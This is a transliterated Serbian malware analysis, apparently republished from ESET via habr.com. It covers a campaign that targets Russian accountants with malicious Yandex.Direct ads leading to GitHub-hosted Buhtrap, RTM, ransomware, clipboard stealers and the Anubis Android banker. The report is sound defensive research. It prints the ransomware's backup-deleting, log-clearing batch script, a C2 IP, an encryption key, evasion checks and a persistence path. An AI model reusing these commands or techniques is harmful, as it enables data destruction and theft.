Да бисте циљали рачуновође у сајбер нападу, можете користити радне документе које траже на мрежи. Отприлике ово је оно што је сајбер група радила у последњих неколико месеци, дистрибуирајући позната позадинска врата. и , као и енкриптори и софтвер за крађу криптовалута. Већина мета се налази у Русији. Напад је изведен постављањем злонамерног оглашавања на Иандек.Дирецт. Потенцијалне жртве су упућене на веб локацију где је од њих затражено да преузму злонамерни фајл прерушен у шаблон документа. Иандек је уклонио злонамерно оглашавање након нашег упозорења.
Бухтрапов изворни код је процурио на мрежи у прошлости тако да свако може да га користи. Немамо информација о доступности РТМ кода.
У овом посту ћемо вам рећи како су нападачи дистрибуирали малвер користећи Иандек.Дирецт и хостовали га на ГитХуб-у. Објава ће се завршити техничком анализом малвера.
Бухтрап и РТМ су поново у послу
Механизам ширења и жртве
Различити терети који се испоручују жртвама имају заједнички механизам ширења. Све злонамерне датотеке које су креирали нападачи смештене су у два различита ГитХуб спремишта.
Типично, спремиште је садржало једну злонамерну датотеку за преузимање, која се често мењала. Пошто вам ГитХуб омогућава да видите историју промена у спремишту, можемо видети који злонамерни софтвер је дистрибуиран током одређеног периода. Да би се жртва убедила да преузме злонамерну датотеку, коришћена је веб локација бланки-схаблони24[.]ру, приказана на слици изнад.
Дизајн сајта и сви називи злонамерних фајлова прате јединствен концепт – обрасци, шаблони, уговори, узорци итд. С обзиром да су Бухтрап и РТМ софтвер већ коришћени у нападима на рачуновође у прошлости, претпоставили смо да стратегија у новој кампањи је иста. Питање је само како је жртва дошла до места нападача.
Инфекција
Најмање неколико потенцијалних жртава које су завршиле на овом сајту привукло је злонамерно оглашавање. Испод је пример УРЛ адресе:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Као што можете видети са линка, банер је постављен на легитимном рачуноводственом форуму бб.ф2[.]кз. Важно је напоменути да су се банери појавили на различитим сајтовима, сви су имали исти ИД кампање (бланки_рсиа), а већина се односила на услуге рачуноводства или правне помоћи. УРЛ показује да је потенцијална жртва користила захтев „преузми образац за фактуру“, који подржава нашу хипотезу о циљаним нападима. Испод су сајтови на којима су се појавили банери и одговарајући упити за претрагу.
- преузми образац рачуна – бб.ф2[.]кз
- пример уговора - Ипопен[.]ру
- пријава жалбе узорак - 77метров[.]ру
- образац споразума - бланк-договор-купли-продазхи[.]ру
- пример судске молбе - зен.иандек[.]ру
- пример жалбе - иурдаи[.]ру
- узорци образаца уговора – Регфорум[.]ру
- облик уговора – ассистентус[.]ру
- пример уговора о стану – направах[.]цом
- узорци правних уговора - авито[.]ру
Сајт бланки-схаблони24[.]ру је можда конфигурисан да прође једноставну визуелну процену. Обично оглас који упућује на сајт професионалног изгледа са везом до ГитХуб-а не изгледа као нешто очигледно лоше. Поред тога, нападачи су отпремали злонамерне датотеке у спремиште само у ограниченом периоду, вероватно током кампање. Већину времена ГитХуб спремиште је садржало празну зип архиву или празну ЕКСЕ датотеку. Тако су нападачи могли да дистрибуирају оглашавање преко Иандек.Дирецт-а на сајтовима које су највероватније посећивали рачуновође који су долазили као одговор на одређене упите за претрагу.
Даље, погледајмо различите корисне терете дистрибуиране на овај начин.
Анализа корисног оптерећења
Хронологија дистрибуције
Злонамерна кампања је почела крајем октобра 2018. и активна је у време писања овог текста. Пошто је читаво складиште било јавно доступно на ГитХубу, саставили смо тачну временску линију дистрибуције шест различитих породица злонамерног софтвера (погледајте слику испод). Додали смо линију која показује када је откривена веза банера, мерено ЕСЕТ телеметријом, ради поређења са гит историјом. Као што видите, ово добро корелира са доступношћу корисног оптерећења на ГитХуб-у. Неслагање крајем фебруара може се објаснити чињеницом да нисмо имали део историје промена јер је спремиште уклоњено са ГитХуб-а пре него што смо га могли добити у потпуности.
Слика 1. Хронологија дистрибуције малвера.
Сертификати за потписивање кода
Кампања је користила више сертификата. Неке је потписало више од једне породице малвера, што даље указује да различити узорци припадају истој кампањи. Упркос доступности приватног кључа, оператери нису систематски потписивали бинарне датотеке и нису користили кључ за све узорке. Крајем фебруара 2019. нападачи су почели да креирају неважеће потписе користећи сертификат у власништву Гоогле-а за који нису имали приватни кључ.
Сви сертификати укључени у кампању и породице малвера које потписују наведени су у табели испод.
Такође смо користили ове сертификате за потписивање кода да бисмо успоставили везе са другим породицама малвера. За већину сертификата нисмо пронашли узорке који нису дистрибуирани преко ГитХуб спремишта. Међутим, сертификат ТОВ „МАРИИА“ је коришћен за потписивање злонамерног софтвера који припада ботнету , адвер и рудари. Мало је вероватно да је овај малвер повезан са овом кампањом. Највероватније, сертификат је купљен на даркнету.
Вин32/Филецодер.Бухтрап
Прва компонента која нам је привукла пажњу је новооткривени Вин32/Филецодер.Бухтрап. Ово је Делпхи бинарна датотека која се понекад пакује. Углавном је дистрибуиран у периоду од фебруара до марта 2019. Понаша се како и приличи програму рансомваре – претражује локалне дискове и мрежне фасцикле и шифрује откривене датотеке. Није потребна интернетска веза да би била угрожена јер не контактира сервер да пошаље кључеве за шифровање. Уместо тога, додаје „токен“ на крај поруке о откупнини и предлаже коришћење е-поште или Битмессаге-а за контактирање оператера.
Да би шифровао што је могуће више осетљивих ресурса, Филецодер.Бухтрап покреће нит дизајнирану да искључи софтвер кључа који може имати отворене руковаоце датотекама који садрже вредне информације које би могле да ометају шифровање. Циљни процеси су углавном системи за управљање базама података (ДБМС). Поред тога, Филецодер.Бухтрап брише датотеке евиденције и резервне копије како би отежао опоравак података. Да бисте то урадили, покрените групну скрипту испод.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Филецодер.Бухтрап користи легитимни интернет ИП Логгер сервис дизајниран за прикупљање информација о посетиоцима веб локације. Ово је намењено праћењу жртава рансомваре-а, што је одговорност командне линије:
mshta.exe "javascript:document.write('');"
Датотеке за шифровање се бирају ако се не подударају са три листе искључења. Прво, датотеке са следећим екстензијама нису шифроване: .цом, .цмд, .цпл, .длл, .еке, .хта, .лнк, .мсц, .мси, .мсп, .пиф, .сцр, .сис и .шишмиш. Друго, све датотеке за које пуна путања садржи низове директоријума са листе испод су искључене.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Треће, одређени називи датотека су такође искључени из шифровања, међу њима и назив датотеке поруке о откупнини. Листа је представљена у наставку. Очигледно, сви ови изузеци имају за циљ да одржавају машину у раду, али са минималном техничком исправношћу.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Шема шифровања датотека
Када се изврши, малвер генерише 512-битни РСА пар кључева. Приватни експонент (д) и модул (н) се затим шифрују тврдо кодираним 2048-битним јавним кључем (јавни експонент и модул), злиб-пакованим и кодираним басе64. Код одговоран за ово је приказан на слици 2.
Слика 2. Резултат декомпилације Хек-Раис процеса генерисања 512-битног РСА пара кључева.
Испод је пример обичног текста са генерисаним приватним кључем, који је токен приложен поруци о откупнини.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Јавни кључ нападача је дат у наставку.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Датотеке су шифроване помоћу АЕС-128-ЦБЦ са 256-битним кључем. За сваку шифровану датотеку, генеришу се нови кључ и нови вектор иницијализације. Кључне информације се додају на крај шифроване датотеке. Хајде да размотримо формат шифроване датотеке.
Шифроване датотеке имају следеће заглавље:
Подаци изворне датотеке са додатком ВЕГА магичне вредности су шифровани на првих 0к5000 бајтова. Све информације о дешифровању су приложене датотеци са следећом структуром:
– Маркер величине датотеке садржи ознаку која показује да ли је датотека већа од 0к5000 бајтова
— АЕС кључ блоб = ЗлибЦомпресс(РСАЕнцрипт(АЕС кључ + ИВ, јавни кључ генерисаног пара кључева РСА))
– РСА кључ блоб = ЗлибЦомпресс(РСАЕнцрипт(генерисани РСА приватни кључ, чврсто кодирани РСА јавни кључ))
Вин32/ЦлипБанкер
Вин32/ЦлипБанкер је компонента која се повремено дистрибуирала од краја октобра до почетка децембра 2018. Његова улога је да прати садржај међуспремника, тражи адресе новчаника криптовалута. Након што је одредио циљну адресу новчаника, ЦлипБанкер је замењује адресом за коју се верује да припада оператерима. Узорци које смо прегледали нису били ни упаковани ни замагљени. Једини механизам који се користи за маскирање понашања је стринг енкрипција. Адресе новчаника оператера су шифроване помоћу РЦ4. Циљне криптовалуте су Битцоин, Битцоин Цасх, Догецоин, Етхереум и Риппле.
Током периода који се малвер ширио на Битцоин новчанике нападача, мала количина послата је ВТС-у, што доводи у сумњу успех кампање. Поред тога, нема доказа који би сугерисали да су ове трансакције уопште биле повезане са ЦлипБанкер-ом.
Вин32/РТМ
Вин32/РТМ компонента је дистрибуирана неколико дана почетком марта 2019. РТМ је тројански банкар написан у Делпхију, намењен даљинским банкарским системима. Истраживачи ЕСЕТ-а су објавили 2017 овог програма, опис је и даље релевантан. У јануару 2019, Пало Алто Нетворкс је такође објавио .
Бухтрап Лоадер
Неко време је на ГитХуб-у био доступан програм за преузимање који није био сличан претходним Бухтрап алатима. Он се окреће ка https://94.100.18[.]67/RSS.php?<some_id> да добије следећу фазу и учита је директно у меморију. Можемо разликовати два понашања кода друге фазе. У првом УРЛ-у, РСС.пхп је директно проследио Бухтрап бацкдоор - овај бацкдоор је веома сличан оном који је доступан након што је изворни код процурео.
Занимљиво је да видимо неколико кампања са Бухтрап бацкдоор-ом, а наводно их воде различити оператери. У овом случају, главна разлика је у томе што се бацкдоор учитава директно у меморију и не користи уобичајену шему са процесом постављања ДЛЛ-а о којем смо причали . Поред тога, оператери су променили кључ РЦ4 који се користи за шифровање мрежног саобраћаја до Ц&Ц сервера. У већини кампања које смо видели, оператери се нису трудили да промене овај кључ.
Друго, сложеније понашање је било да је РСС.пхп УРЛ прослеђен другом учитавачу. Имплементирао је неку обфусацију, као што је поновна изградња табеле динамичког увоза. Сврха покретача је да контактира Ц&Ц сервер [.]цом/апи/Ф27Ф84ЕДА4Д13Б15/2, пошаљите евиденцију и сачекајте одговор. Он обрађује одговор као блоб, учитава га у меморију и извршава. Корисни терет који смо видели приликом извршавања овог учитавача био је исти Бухтрап бацкдоор, али можда постоје и друге компоненте.
Андроид/Спи.Банкер
Занимљиво је да је компонента за Андроид такође пронађена у ГитХуб репозиторијуму. У матичној филијали био је само један дан – 1. Осим што је објављен на ГитХуб-у, ЕСЕТ телеметрија не налази доказе о дистрибуцији овог малвера.
Компонента је била хостована као Андроид апликацијски пакет (АПК). Јако је замућено. Злонамерно понашање је скривено у шифрованом ЈАР-у који се налази у АПК-у. Шифрован је са РЦ4 помоћу овог кључа:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Исти кључ и алгоритам се користе за шифровање стрингова. ЈАР се налази у APK_ROOT + image/files. Прва 4 бајта датотеке садрже дужину шифрованог ЈАР-а, која почиње одмах након поља за дужину.
Након што смо дешифровали датотеку, открили смо да је то био Анубис - раније банкар за Андроид. Малвер има следеће карактеристике:
- снимање микрофоном
- прављење снимака екрана
- добијање ГПС координата
- кеилоггер
- шифровање података уређаја и захтев за откупнином
- слање нежељене поште
Занимљиво је да је банкар користио Твиттер као резервни комуникациони канал да би добио још један Ц&Ц сервер. Узорак који смо анализирали користио је @ЈонесТрадер налог, али је у време анализе већ био блокиран.
Банкар садржи листу циљних апликација на Андроид уређају. Дужа је од листе добијене у студији Сопхос. Листа укључује многе банкарске апликације, програме за куповину на мрежи као што су Амазон и еБаи и услуге криптовалута.
МСИЛ/ЦлипБанкер.ИХ
Последња компонента која је дистрибуирана у оквиру ове кампање била је .НЕТ Виндовс извршна датотека, која се појавила у марту 2019. године. Већина проучаваних верзија је упакована у ЦонфусерЕк в1.0.0. Као и ЦлипБанкер, ова компонента користи међуспремник. Његов циљ је широк спектар криптовалута, као и понуде на Стеам-у. Поред тога, он користи услугу ИП Логгер да украде Битцоин приватни ВИФ кључ.
Механизми заштите
Поред предности које ЦонфусерЕк пружа у спречавању отклањања грешака, избацивања и манипулисања, компонента укључује могућност откривања антивирусних производа и виртуелних машина.
Да би проверио да ли ради на виртуелној машини, злонамерни софтвер користи уграђену Виндовс ВМИ командну линију (ВМИЦ) да захтева информације о БИОС-у, и то:
wmic bios
Затим програм анализира излаз команде и тражи кључне речи: ВБОКС, ВиртуалБок, КСЕН, кему, боцхс, ВМ.
Да би открио антивирусне производе, злонамерни софтвер шаље захтев Виндовс Манагемент Инструментатион (ВМИ) Виндовс Сецурити Центер користећи ManagementObjectSearcher АПИ као што је приказано испод. Након декодирања са басе64 позив изгледа овако:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Слика 3. Процес за идентификацију антивирусних производа.
Поред тога, малвер проверава да ли , алат за заштиту од напада међумеморије и, ако је покренут, суспендује све нити у том процесу, чиме се онемогућава заштита.
Упорност
Верзија малвера коју смо проучавали се копира %APPDATA%googleupdater.exe и поставља атрибут „хидден“ за гоогле директоријум. Затим мења вредност SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell у Виндовс регистратор и додаје путању updater.exe. На овај начин, малвер ће се извршавати сваки пут када се корисник пријави.
Злонамерно понашање
Као и ЦлипБанкер, злонамерни софтвер прати садржај међуспремника и тражи адресе новчаника за криптовалуте, а када га пронађе, замењује га једном од адреса оператера. Испод је листа циљних адреса на основу онога што се налази у коду.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
За сваки тип адресе постоји одговарајући регуларни израз. Вредност СТЕАМ_УРЛ се користи за напад на Стеам систем, као што се може видети из регуларног израза који се користи за дефинисање у баферу:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Канал за ексфилтрацију
Поред замене адреса у баферу, малвер циља приватне ВИФ кључеве Битцоин, Битцоин Цоре и Елецтрум Битцоин новчанике. Програм користи плоггер.орг као канал за ексфилтрацију за добијање приватног кључа ВИФ-а. Да би то урадили, оператери додају податке приватног кључа у ХТТП заглавље Усер-Агента, као што је приказано у наставку.
Слика 4. ИП Логгер конзола са излазним подацима.
Оператери нису користили иплоггер.орг за ексфилтрирање новчаника. Вероватно су прибегли другом методу због ограничења од 255 знакова у пољу User-Agentприказано у веб интерфејсу ИП Логгер-а. У узорцима које смо проучавали, други излазни сервер је ускладиштен у променљивој окружења DiscordWebHook. Изненађујуће, ова променљива окружења није додељена нигде у коду. Ово сугерише да је малвер још увек у развоју и да је променљива додељена тест машини оператера.
Постоји још један знак да је програм у развоју. Бинарна датотека укључује две УРЛ адресе иплоггер.орг и обе се питају када се подаци ексфилтрирају. У захтеву за једну од ових УРЛ адреса, вредности у пољу Реферер претходи „ДЕВ /“. Такође смо пронашли верзију која није упакована помоћу ЦонфусерЕк-а, прималац за ову УРЛ адресу се зове ДевФеедбацкУрл. На основу имена променљиве окружења, верујемо да оператери планирају да користе легитимну услугу Дисцорд и њен систем за пресретање веба за крађу новчаника криптовалута.
Закључак
Ова кампања је пример коришћења легитимних рекламних услуга у сајбер нападима. Шема је усмерена на руске организације, али не бисмо били изненађени када бисмо видели такав напад користећи неруске услуге. Да би избегли компромис, корисници морају да буду сигурни у репутацију извора софтвера који преузимају.
Комплетна листа МИТЕР АТТ&ЦК индикатора компромиса и атрибута доступна је на .
Извор: ввв.хабр.цом